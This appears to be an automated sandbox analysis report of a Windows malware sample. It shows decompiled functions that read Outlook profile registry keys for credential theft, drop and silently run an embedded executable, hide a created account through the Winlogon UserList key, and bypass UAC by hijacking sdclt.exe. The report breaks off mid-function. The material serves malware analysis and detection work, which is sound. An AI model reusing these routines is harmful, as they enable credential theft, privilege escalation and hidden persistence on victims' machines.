                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Create$FileHandlelstrcatlstrcpylstrlen$ClassCloseDirectoryDispatchFindFirstFolderLocalModulePathRegisterTimeTranslateWindowwsprintf
                                      • String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
                                      • API String ID: 2678186124-2372768292
                                      • Opcode ID: d8a433de6b6426e13d78070eda398d663bec40e3adb73af1f71e2b8eae7b89cf
                                      • Instruction ID: 4553b19229ac46e0a2047d37921a0cd3f040b066402a8f9f86d7a6066209b53d
                                      • Opcode Fuzzy Hash: d8a433de6b6426e13d78070eda398d663bec40e3adb73af1f71e2b8eae7b89cf
                                      • Instruction Fuzzy Hash: 1C71A176604300ABD710DF65DC45E6BB7E8FF8E704F01492EF65893291DA78E904CB6A
                                      Uniqueness

                                      Uniqueness Score: 37.75%

                                      Function 00438D7E, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 160registrystringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E00438D7E(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr _v20;
				short _v4116;
				short _v8212;
				short _v12308;
				long _t68;
				int _t74;
				intOrPtr _t75;
				void* _t76;
				short* _t80;

				_t76 = __edx;
				_t75 = __ecx;
				E00431130(0x3014, __ecx);
				_v20 = _t75;
				_t74 = 0;
				E00431052( &_v4116, 0, 0x800);
				E00431052( &_v8212, 0, 0x800);
				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8) != 0) {
					__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
					if(__eflags != 0) {
						__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
						if(__eflags != 0) {
							_t80 = L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676";
							__eflags = RegOpenKeyExW(0x80000001, _t80, 0, 0xf003f,  &_v8);
							if(__eflags != 0) {
								L15:
								__eflags = 0;
								return 0;
							}
							_push(_t80);
							L8:
							lstrcpyW( &_v4116, ??);
							if(RegQueryInfoKeyW(_v8, _t74, _t74, _t74,  &_v16,  &_v12, _t74, _t74, _t74, _t74, _t74, _t74) != 0) {
								goto L15;
							}
							if(_v16 <= _t74) {
								L14:
								return 1;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								_v12 = 0x800;
								if(RegEnumKeyExW(_v8, _t74,  &_v12308,  &_v12, 0, 0, 0, 0) != 0) {
									goto L15;
								}
								RegCloseKey(_v8);
								lstrcpyW( &_v8212,  &_v4116);
								lstrcatW( &_v8212, "\\");
								lstrcatW( &_v8212,  &_v12308);
								_t68 = RegOpenKeyExW(0x80000001,  &_v8212, 0, 0xf003f,  &_v8);
								_t90 = _t68;
								if(_t68 != 0) {
									goto L15;
								}
								_push(_t75);
								_t75 = _v20;
								E00438F40(_t75, _t76, _t90, _v8);
								RegCloseKey(_v8);
								if(RegOpenKeyExW(0x80000001,  &_v4116, 0, 0xf003f,  &_v8) != 0) {
									goto L15;
								}
								_t74 = _t74 + 1;
								if(_t74 < _v16) {
									continue;
								}
								goto L14;
							}
							goto L15;
						}
						_push(L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676");
						goto L8;
					}
					_push(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
					goto L8;
				}
				_push(L"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
				goto L8;
			}















                                      0x00438d7e
                                      0x00438d7e
                                      0x00438d86
                                      0x00438d93
                                      0x00438d97
                                      0x00438da1
                                      0x00438db2
                                      0x00438dd9
                                      0x00438df4
                                      0x00438df6
                                      0x00438e11
                                      0x00438e13
                                      0x00438e22
                                      0x00438e2f
                                      0x00438e31
                                      0x00438f39
                                      0x00438f39
                                      0x00000000
                                      0x00438f39
                                      0x00438e37
                                      0x00438e38
                                      0x00438e45
                                      0x00438e63
                                      0x00000000
                                      0x00000000
                                      0x00438e6c
                                      0x00438f34
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00438e72
                                      0x00438e72
                                      0x00438e74
                                      0x00438e96
                                      0x00000000
                                      0x00000000
                                      0x00438e9f
                                      0x00438eb3
                                      0x00438ec1
                                      0x00438ed5
                                      0x00438ef2
                                      0x00438ef4
                                      0x00438ef6
                                      0x00000000
                                      0x00000000
                                      0x00438ef8
                                      0x00438efc
                                      0x00438eff
                                      0x00438f07
                                      0x00438f28
                                      0x00000000
                                      0x00000000
                                      0x00438f2a
                                      0x00438f2e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00438f2e
                                      0x00000000
                                      0x00438e72
                                      0x00438e15
                                      0x00000000
                                      0x00438e15
                                      0x00438df8
                                      0x00000000
                                      0x00438df8
                                      0x00438ddb
                                      0x00000000

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 00438DD5
                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 00438DF2
                                      • lstrcpyW.KERNEL32(?,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676), ref: 00438E45
                                      • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00438E5B
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 00438E8E
                                      • RegCloseKey.ADVAPI32(?), ref: 00438E9F
                                      • lstrcpyW.KERNEL32(?,?), ref: 00438EB3
                                      • lstrcatW.KERNEL32(?,00442644), ref: 00438EC1
                                      • lstrcatW.KERNEL32(?,?), ref: 00438ED5
                                      • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 00438EF2
                                      • RegCloseKey.ADVAPI32(?,?), ref: 00438F07
                                      • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 00438F24
                                      Strings
                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 00438E05, 00438E15
                                      • Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00438DCB
                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00438DE8, 00438DF8
                                      • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00438E22, 00438E27, 00438E37
                                      • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00438DDB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
                                      • String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                      • API String ID: 1891545080-2020977430
                                      • Opcode ID: 10286faae152fdc18d70abeccbf13f4ef0cd44cf323084bc2bab2abe3dc97d99
                                      • Instruction ID: 00f002cab1f65c7af10e74a72e75010e38f9406cadef468b3b38251ec679610f
                                      • Opcode Fuzzy Hash: 10286faae152fdc18d70abeccbf13f4ef0cd44cf323084bc2bab2abe3dc97d99
                                      • Instruction Fuzzy Hash: 09412FB190021DBEEB20DBA1CC45EFFB76CEB19784F1004AAB615E2111EAB49E44DB74
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 00440E40, Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 124filestringUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E00440E40(void* __ecx, void* __eflags, long _a4) {
				intOrPtr* _v8;
				long _v12;
				struct _SHELLEXECUTEINFOA _v72;
				char _v1096;
				char _v2120;
				char _v3144;
				void* _t37;
				void* _t39;
				struct HRSRC__* _t80;
				void* _t83;

				_t75 =  *_a4;
				_t67 = __ecx + 4;
				_v8 = __ecx + 4;
				E00433264(_t67, E0043FC1E( &_a4,  *_a4 + 4,  *_t75));
				E00435A2D(_a4);
				_t80 = FindResourceW(0, 0x67, L"WM_FIND");
				_t37 = LoadResource(0, _t80);
				_a4 = SizeofResource(0, _t80);
				_t39 = LockResource(_t37);
				E00431052( &_v1096, 0, 0x400);
				E00431052( &_v2120, 0, 0x400);
				GetTempPathA(0x400,  &_v1096);
				lstrcatA( &_v1096, "find.exe");
				GetTempPathA(0x400,  &_v2120);
				lstrcatA( &_v2120, "find.db");
				_t83 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
				WriteFile(_t83, _t39, _a4,  &_v12, 0);
				CloseHandle(_t83);
				E00431052( &_v3144, 0, 0x400);
				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
				_v72.cbSize = 0x3c;
				_v72.lpFile =  &_v1096;
				_v72.fMask = 0x40;
				asm("xorps xmm0, xmm0");
				_v72.lpParameters =  &_v3144;
				asm("movlpd [ebp-0x20], xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				asm("movlpd [ebp-0x10], xmm0");
				_v72.hwnd = 0;
				_v72.lpVerb = 0;
				_v72.lpDirectory = 0;
				_v72.nShow = 0;
				_v72.hInstApp = 0;
				return ShellExecuteExA( &_v72);
			}













                                      0x00440e4f
                                      0x00440e51
                                      0x00440e57
                                      0x00440e68
                                      0x00440e70
                                      0x00440e85
                                      0x00440e89
                                      0x00440e9a
                                      0x00440e9d
                                      0x00440eb4
                                      0x00440ec3
                                      0x00440ed9
                                      0x00440eed
                                      0x00440efb
                                      0x00440f09
                                      0x00440f2b
                                      0x00440f36
                                      0x00440f3d
                                      0x00440f50
                                      0x00440f6d
                                      0x00440f79
                                      0x00440f80
                                      0x00440f8c
                                      0x00440f93
                                      0x00440f96
                                      0x00440f9c
                                      0x00440fa2
                                      0x00440fa7
                                      0x00440fac
                                      0x00440faf
                                      0x00440fb2
                                      0x00440fb5
                                      0x00440fb8
                                      0x00440fc5

                                      APIs
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      • FindResourceW.KERNEL32(00000000,00000067,WM_FIND), ref: 00440E7F
                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00440E89
                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00440E93
                                      • LockResource.KERNEL32(00000000), ref: 00440E9D
                                      • GetTempPathA.KERNEL32(00000400,?), ref: 00440ED9
                                      • lstrcatA.KERNEL32(?,find.exe), ref: 00440EED
                                      • GetTempPathA.KERNEL32(00000400,?), ref: 00440EFB
                                      • lstrcatA.KERNEL32(?,find.db), ref: 00440F09
                                      • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 00440F24
                                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00440F36
                                      • CloseHandle.KERNEL32(00000000), ref: 00440F3D
                                      • wsprintfA.USER32 ref: 00440F6D
                                      • ShellExecuteExA.SHELL32(0000003C), ref: 00440FBB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFindFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                      • String ID: -w %ws -d C -f %s$<$@$WM_FIND$find.db$find.exe
                                      • API String ID: 2851928664-3107137372
                                      • Opcode ID: 7ba1ad1331888ea7f12c1e4c8410f0aaca85bfa95c92e221241c1346cf070c9d
                                      • Instruction ID: 7276a63306b66a70d10eb096618c09a6ccb0429c592a28c99f1593bba1d065c4
                                      • Opcode Fuzzy Hash: 7ba1ad1331888ea7f12c1e4c8410f0aaca85bfa95c92e221241c1346cf070c9d
                                      • Instruction Fuzzy Hash: 20414CB590021CABDB10DBA1DD85FDEBBBCFF89304F1041A6F609A3150DAB45A458FA8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043C67E, Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237registryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043C67E(void* __edx, char _a4, char _a8) {
				void* _v12;
				char _v16;
				int _v20;
				char _v36;
				void _v44;
				void* _t51;
				int _t56;
				int _t70;
				void* _t104;
				signed int _t115;
				void* _t161;
				void* _t162;
				void* _t163;
				int _t172;

				_t161 = __edx;
				InitializeCriticalSection( &_v44);
				_t115 = 6;
				DeleteCriticalSection(memcpy(0x447cd8,  &_v44, _t115 << 2));
				EnterCriticalSection(0x447cd8);
				_t167 = _a4;
				_t111 = _a8;
				 *0x447d38 = _a4;
				 *0x447d2c = 0x446cb8;
				 *0x447d28 = _a8;
				if(E0043C1A0(_t161) == 0) {
					_t51 = E0043D4B8();
					__eflags = _t51 - 6;
					if(_t51 < 6) {
						L14:
						E00434B53(_t167, E004347F1( &_v36, 2, 0x447d30, 0x447d34));
						E004347CE( &_v36);
						LeaveCriticalSection(0x447cd8);
						__eflags = 0;
						return 0;
					}
					_t56 = E0043D469();
					__eflags = _t56;
					if(_t56 != 0) {
						goto L14;
					}
					__eflags = E0043DB97() - 1;
					if(__eflags == 0) {
						_t162 = 8;
						E00433264(0x447d30, E004332D4( &_a4, _t162, __eflags));
						E00435A2D(_a4);
						_t163 = 8;
						E00433264(0x447d34, E004332D4( &_a4, _t163, __eflags));
						E00435A2D(_a4);
						_t172 = 0;
						RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", 0, 0, 0, 0xf013f, 0,  &_v12,  &_v20);
						_v16 = 0;
						RegSetValueExW(_v12,  *0x447d30, 0, 4,  &_v16, 4);
						RegCloseKey(_v12);
						_t70 = E0043B799(0x447d30, 0x447d34);
						__eflags = _t70;
						if(_t70 != 0) {
							E0043F462(_a8, _t163, E00433412( &_a4, L"rudp"), 0x447d30);
							E00435A2D(_a4);
							E0043F462(_a8, _t163, E00433412( &_a8, L"rpdp"), 0x447d34);
							E00435A2D(_a8);
							E00431E6F(0x447cf0, E0043C57C, 0x447cd8);
							LeaveCriticalSection(0x447cd8);
							return 1;
						}
						E00434B53(_t167, E004347F1( &_v36, 9, 0x447d30, 0x447d34));
						E004347CE( &_v36);
						L12:
						LeaveCriticalSection(0x447cd8);
						return _t172;
					}
					E00434B53(_t167, E004347F1( &_v36, 1, 0x447d30, 0x447d34));
					E004347CE( &_v36);
					_t172 = 0;
					goto L12;
				}
				E00433264(0x447d30, E0043F495(_t111, _t161,  &_a8, E00433412( &_a4, L"rudp")));
				E00435A2D(_a8);
				_a8 = 0;
				E00435A2D(_a4);
				E00433264(0x447d34, E0043F495(_t111, _t161,  &_a8, E00433412( &_a4, L"rpdp")));
				E00435A2D(_a8);
				_a8 = 0;
				E00435A2D(_a4);
				if(E0043308E(0x447d30) != 0 || E0043308E(0x447d34) != 0) {
					E00434B53(_t167, E004347F1( &_v36, 8, 0x447d30, 0x447d34));
					E004347CE( &_v36);
				} else {
					_t104 = E00433412( &_a4, 0x442608);
					E00434B53(_t167, E004347F1( &_v36, 8, E00433412( &_a8, 0x442608), _t104));
					E004347CE( &_v36);
					E00435A2D(_a8);
					_a8 = 0;
					E00435A2D(_a4);
				}
				_t172 = 1;
				goto L12;
			}

















                                      0x0043c67e
                                      0x0043c68b
                                      0x0043c693
                                      0x0043c6a2
                                      0x0043c6ae
                                      0x0043c6b4
                                      0x0043c6b7
                                      0x0043c6ba
                                      0x0043c6c0
                                      0x0043c6ca
                                      0x0043c6d7
                                      0x0043c7d8
                                      0x0043c7dd
                                      0x0043c7e0
                                      0x0043c953
                                      0x0043c96a
                                      0x0043c972
                                      0x0043c978
                                      0x0043c97e
                                      0x00000000
                                      0x0043c97e
                                      0x0043c7e6
                                      0x0043c7eb
                                      0x0043c7ed
                                      0x00000000
                                      0x00000000
                                      0x0043c7f8
                                      0x0043c7fb
                                      0x0043c82a
                                      0x0043c839
                                      0x0043c841
                                      0x0043c848
                                      0x0043c859
                                      0x0043c861
                                      0x0043c869
                                      0x0043c883
                                      0x0043c88e
                                      0x0043c89e
                                      0x0043c8a7
                                      0x0043c8b3
                                      0x0043c8b8
                                      0x0043c8ba
                                      0x0043c907
                                      0x0043c90f
                                      0x0043c925
                                      0x0043c92d
                                      0x0043c942
                                      0x0043c948
                                      0x00000000
                                      0x0043c950
                                      0x0043c8cf
                                      0x0043c8d7
                                      0x0043c8dc
                                      0x0043c8e2
                                      0x00000000
                                      0x0043c8e8
                                      0x0043c814
                                      0x0043c81c
                                      0x0043c821
                                      0x00000000
                                      0x0043c821
                                      0x0043c6fc
                                      0x0043c704
                                      0x0043c70e
                                      0x0043c711
                                      0x0043c737
                                      0x0043c73f
                                      0x0043c747
                                      0x0043c74a
                                      0x0043c75b
                                      0x0043c7c3
                                      0x0043c7cb
                                      0x0043c768
                                      0x0043c771
                                      0x0043c78e
                                      0x0043c796
                                      0x0043c79e
                                      0x0043c7a6
                                      0x0043c7a9
                                      0x0043c7a9
                                      0x0043c7d2
                                      0x00000000

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(?,?,?), ref: 0043C68B
                                      • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0043C6A2
                                      • EnterCriticalSection.KERNEL32(00447CD8,?,?), ref: 0043C6AE
                                        • Part of subcall function 0043C1A0: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,00447CD8,?,?,0043C6D5,?,?), ref: 0043C1D2
                                      • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?,00000000,00000000,?,?), ref: 0043C883
                                      • RegSetValueExW.ADVAPI32(?,00000000,00000004,?,00000004,?,?), ref: 0043C89E
                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 0043C8A7
                                      • LeaveCriticalSection.KERNEL32(00447CD8,00000000,00447D30,00447D34,?,?), ref: 0043C8E2
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 0043308E: lstrlenW.KERNEL32(?,00433473,?,?,?,0043F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00433095
                                      • LeaveCriticalSection.KERNEL32(00447CD8,00000000,rpdp,00447D34,00000000,rudp,00447D30,00447D30,00447D34,?,?), ref: 0043C948
                                      • LeaveCriticalSection.KERNEL32(00447CD8,00000000,?,?), ref: 0043C978
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$Leavelstrlen$lstrcpy$CloseCreateDeleteEnterFreeInitializeOpenValueVirtual
                                      • String ID: 0}D$0}D$0}D$4}D$4}D$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp
                                      • API String ID: 2046459734-753590845
                                      • Opcode ID: 12d2c47f58fff7b235118189204d94ecae2e8c2b279051d20560e012642d4eef
                                      • Instruction ID: 556f5f83cea60d274d85d864d4cd931a9eb990304c5d68c3c3d05cbc89ecc106
                                      • Opcode Fuzzy Hash: 12d2c47f58fff7b235118189204d94ecae2e8c2b279051d20560e012642d4eef
                                      • Instruction Fuzzy Hash: D17194B06101146ADB04FF61CC86AEE7769AF5C714F10A42FB905A6192DF7C6E06CBAC
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043F8C0, Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 88sleepregistrystringUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 84%
                                      			E0043F8C0(void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				struct _SHELLEXECUTEINFOW _v72;
				short _v592;
				char _v1616;
				short* _t52;

				if(E0043DB97() != 1) {
					_v8 = 0;
					__imp__IsWow64Process(GetCurrentProcess(),  &_v8);
					if(_v8 != 0) {
						_t46 =  &_v12;
						E0043D5DB( &_v12);
					}
					E0043F6C1();
					E00431052( &_v1616, 0, 0x400);
					GetModuleFileNameA(0,  &_v1616, 0x400);
					E0043F65C(_t46, 0x444713,  &_v1616);
					E0043F65C(_t46, "DelegateExecute", 0x444713);
					GetSystemDirectoryW( &_v592, 0x104);
					lstrcatW( &_v592, L"\\sdclt.exe");
					_t52 = L"open";
					ShellExecuteW(0, _t52,  &_v592, 0, 0, 1);
					asm("movaps xmm0, [0x4449b0]");
					_v72.lpFile =  &_v592;
					_v72.cbSize = 0x3c;
					_v72.fMask = 0x40;
					_v72.hwnd = 0;
					_v72.lpVerb = _t52;
					asm("movups [ebp-0x30], xmm0");
					ShellExecuteExW( &_v72);
					TerminateProcess(_v72.hProcess, 0);
					if(_v8 != 0) {
						E0043D5B4( &_v12);
					}
					Sleep(0x7d0);
					RegDeleteKeyA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command");
					ExitProcess(0);
				}
				return 0;
			}









                                      0x0043f8d3
                                      0x0043f8df
                                      0x0043f8e9
                                      0x0043f8f2
                                      0x0043f8f4
                                      0x0043f8f7
                                      0x0043f8f7
                                      0x0043f8fc
                                      0x0043f90f
                                      0x0043f920
                                      0x0043f933
                                      0x0043f93e
                                      0x0043f952
                                      0x0043f964
                                      0x0043f974
                                      0x0043f97c
                                      0x0043f982
                                      0x0043f98f
                                      0x0043f996
                                      0x0043f99d
                                      0x0043f9a4
                                      0x0043f9a7
                                      0x0043f9aa
                                      0x0043f9ae
                                      0x0043f9b8
                                      0x0043f9c1
                                      0x0043f9c6
                                      0x0043f9c6
                                      0x0043f9d0
                                      0x0043f9e0
                                      0x0043f9e7
                                      0x0043f9e7
                                      0x0043f9f2

                                      APIs
                                        • Part of subcall function 0043DB97: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0043DBA9
                                        • Part of subcall function 0043DB97: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0043DBB0
                                        • Part of subcall function 0043DB97: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0043DBCE
                                        • Part of subcall function 0043DB97: CloseHandle.KERNEL32(00000000), ref: 0043DBE3
                                      • GetCurrentProcess.KERNEL32(?,?,00000000), ref: 0043F8E2
                                      • IsWow64Process.KERNEL32(00000000), ref: 0043F8E9
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 0043F920
                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0043F952
                                      • lstrcatW.KERNEL32(?,\sdclt.exe), ref: 0043F964
                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0043F97C
                                      • ShellExecuteExW.SHELL32(?), ref: 0043F9AE
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043F9B8
                                      • Sleep.KERNEL32(000007D0), ref: 0043F9D0
                                      • RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 0043F9E0
                                      • ExitProcess.KERNEL32 ref: 0043F9E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentExecuteShellToken$CloseDeleteDirectoryExitFileHandleInformationModuleNameOpenSleepSystemTerminateWow64lstrcat
                                      • String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$\sdclt.exe$open
                                      • API String ID: 194334098-2081737068
                                      • Opcode ID: e86374f955405f39f64225bd22bf9a23f7ef55c8838d3f686a9c2fd004c19734
                                      • Instruction ID: 6b8f5aa0efeaf161e369085ad33c8f4cf6a0f575acf8d49af3b2dd801ea18f29
                                      • Opcode Fuzzy Hash: e86374f955405f39f64225bd22bf9a23f7ef55c8838d3f686a9c2fd004c19734
                                      • Instruction Fuzzy Hash: 6C3184B5C01118BBDB10EBA5ED49EDEBBBCEF8A305F500066F509E2150D7B85A45CB68
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 004374B4, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135windowstringfileUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 71%
                                      			E004374B4(void* __edx, void* __eflags) {
				short _v176;
				struct tagMSG _v204;
				void* _v208;
				struct _SYSTEMTIME _v228;
				struct HINSTANCE__* _t19;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t40;
				intOrPtr _t45;
				void* _t46;
				void* _t49;
				intOrPtr* _t50;
				void* _t59;
				struct HINSTANCE__* _t60;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				void* _t68;
				void* _t71;
				void* _t75;
				void* _t79;
				void* _t90;

				_t90 = __eflags;
				_t71 = __edx;
				_t19 = GetModuleHandleA(0);
				_t62 =  *0x446690; // 0x0
				_t60 = _t19;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E00431052(_t62 + 0x210, 0, 0x800);
				_t22 =  *0x446690; // 0x0
				E00431052(_t22 + 0x10, 0, 0x208);
				_t25 =  *0x446690; // 0x0
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t25 + 0x10, _t75, _t79, _t59);
				_t27 =  *0x446690; // 0x0
